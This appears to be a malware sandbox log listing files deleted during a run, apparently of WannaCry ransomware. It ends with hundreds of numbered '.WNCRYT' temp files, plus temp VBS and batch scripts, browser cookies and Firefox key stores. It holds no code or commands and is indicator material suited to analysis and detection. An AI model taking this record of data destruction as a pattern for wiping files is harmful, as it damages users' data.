DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001e.db
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000023.db
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000025.db
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{8396BDEC-CD34-467F-8EB0-706C57B90A2C}.2.ver0x0000000000000002.db
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{887A11BA-C40B-40DA-A994-13F5794EDA58}.2.ver0x0000000000000002.db
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{B77EA8CB-9C6F-4A20-B584-EAC4FF2DF997}.2.ver0x0000000000000002.db
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000001.db
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000002.db
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000003.db
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{ECA0F554-74BF-4F43-9EC2-07E05C31BB3E}.2.ver0x0000000000000001.db
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma
DeletedFile: C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-97EFDC75E4C4E7D093DE204032CBD352A3D2415B.bin.DB
DeletedFile: C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif
DeletedFile: C:\Users\Public\Music\Sample Music\Kalimba.mp3
DeletedFile: C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
DeletedFile: C:\Users\Public\Music\Sample Music\Sleep Away.mp3
DeletedFile: C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
DeletedFile: C:\Users\user\AppData\Local\IconCache.db
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\previews_opt_out.db
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppBlue.png
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppWhite.png
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.gif
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.png
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\CollectOneDriveLogs.bat
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppBlue.png
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppWhite.png
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Error.png
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\OneDriveLogo.png
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaCritical.png
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaError.png
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaNearing.png
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ScreenshotOptIn.gif
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Warning.png
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\cloud.svg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\iceBucket.svg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\onedrivePremium.svg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\partiallyFreezing.svg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settings.svg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settingsdisabled.svg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\stackedIceCubes.svg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\waterGlass.svg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000014.db
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\microsoft-logo.png
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\script.js
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\Built-In Building Blocks.dotx
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cert9.db
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\key4.db
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\prefs.js
DeletedFile: C:\Users\All Users\Boxstarter\BoxStarter.bat
DeletedFile: C:\Users\All Users\Boxstarter\NOTICE.txt
DeletedFile: C:\Users\All Users\Boxstarter\VERIFICATION.txt
DeletedFile: C:\Users\All Users\chocolatey\LICENSE.txt
DeletedFile: C:\Users\All Users\chocolatey\bin\BoxstarterShell.bat
DeletedFile: C:\Users\All Users\chocolatey\bin\_processed.txt
DeletedFile: C:\Users\All Users\chocolatey\config\chocolatey.config.backup
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-DefaultChocolateyLocalFilePath.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-NativeInstallerExitCode.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Set-PowerShellExitCode.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-NativeInstallerExitCode.ps1
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Set-PowerShellExitCode.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\7zip.install\legal\VERIFICATION.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyUninstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\chocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\NOTICE.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\VERIFICATION.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxStarter.bat
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\NOTICE.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\VERIFICATION.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\NOTICE.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\VERIFICATION.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\NOTICE.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\VERIFICATION.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\NOTICE.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\VERIFICATION.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-DefaultChocolateyLocalFilePath.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-NativeInstallerExitCode.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Set-PowerShellExitCode.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-NativeInstallerExitCode.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Set-PowerShellExitCode.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\data.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\data.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\dotnetfx\tools\ChocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\KB3033929\Tools\ChocolateyInstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\chocolateyinstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyBeforeModify.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyinstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyuninstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\python3\legal\VERIFICATION.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyinstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyuninstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\vcredist140\tools\data.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyUninstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib\winrar\tools\helpers.ps1
DeletedFile: C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyuninstall.ps1
DeletedFile: C:\Users\All Users\chocolatey\tools\checksum.license.txt
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\chrome_shutdown_ms.txt
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrivePersonal.cmd
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\errorIcon.svg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\folder.svg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\loading.svg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0YHW5220.txt
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4GSWQ8EN.txt
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\AJGBO9CI.txt
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CAP0QFT4.txt
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CJNGZV8R.txt
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ERX8C8MI.txt
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\F003S46Q.txt
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\H6EPX8R1.txt
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J29G05RA.txt
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J52208RT.txt
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIYBJCU5.txt
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NFUEBPFN.txt
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\U7UAY5KN.txt
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UKC8F8RG.txt
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VGVG2939.txt
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WFG456IG.txt
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X8F9LSJ0.txt
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YM639DI1.txt
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YX6BCVUK.txt
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\AlternateServices.txt
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\pkcs11.txt
DeletedFile: C:\ba69bdf0a250e352360c33\netfx_Full.mzz
DeletedFile: C:\Users\user\AppData\Local\Temp\m.vbs
DeletedFile: C:\Users\user\AppData\Local\Temp\275781765172918.bat
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db
DeletedFile: C:\Users\user\AppData\Roaming\tor\key-pinning-entries
DeletedFile: C:\Users\user\AppData\Local\Temp\0.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\1.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\10.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\100.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\101.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\102.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\103.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\104.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\105.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\106.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\107.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\108.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\109.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\11.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\110.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\111.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\112.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\113.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\114.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\115.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\116.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\117.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\118.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\119.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\12.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\120.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\121.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\122.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\123.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\124.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\125.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\126.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\127.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\128.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\129.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\13.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\130.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\131.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\132.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\133.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\134.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\135.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\136.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\137.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\138.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\139.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\14.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\140.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\141.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\142.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\143.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\144.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\145.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\146.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\147.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\148.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\149.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\15.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\150.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\151.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\152.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\153.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\154.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\155.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\156.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\157.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\158.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\159.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\16.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\160.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\161.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\162.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\163.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\164.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\165.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\166.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\167.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\168.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\169.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\17.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\170.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\171.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\172.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\173.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\174.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\175.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\176.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\177.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\178.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\179.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\18.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\180.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\181.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\182.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\183.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\184.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\185.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\186.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\187.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\188.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\189.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\19.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\190.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\191.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\192.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\193.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\194.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\195.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\196.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\197.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\198.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\199.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\2.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\20.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\200.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\201.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\202.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\203.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\204.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\205.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\206.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\207.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\208.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\209.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\21.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\210.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\211.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\212.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\213.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\214.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\215.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\216.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\217.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\218.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\219.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\22.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\220.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\221.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\222.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\223.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\224.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\225.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\226.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\227.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\228.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\229.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\23.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\230.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\231.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\232.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\233.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\234.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\235.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\236.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\237.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\238.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\239.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\24.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\240.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\241.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\242.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\243.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\244.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\245.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\246.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\247.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\248.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\249.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\25.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\250.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\251.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\252.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\253.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\254.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\255.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\256.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\257.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\258.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\259.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\26.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\260.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\261.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\262.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\263.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\264.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\265.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\266.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\267.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\268.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\269.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\27.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\270.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\271.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\272.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\273.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\274.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\275.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\276.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\277.WNCRYT
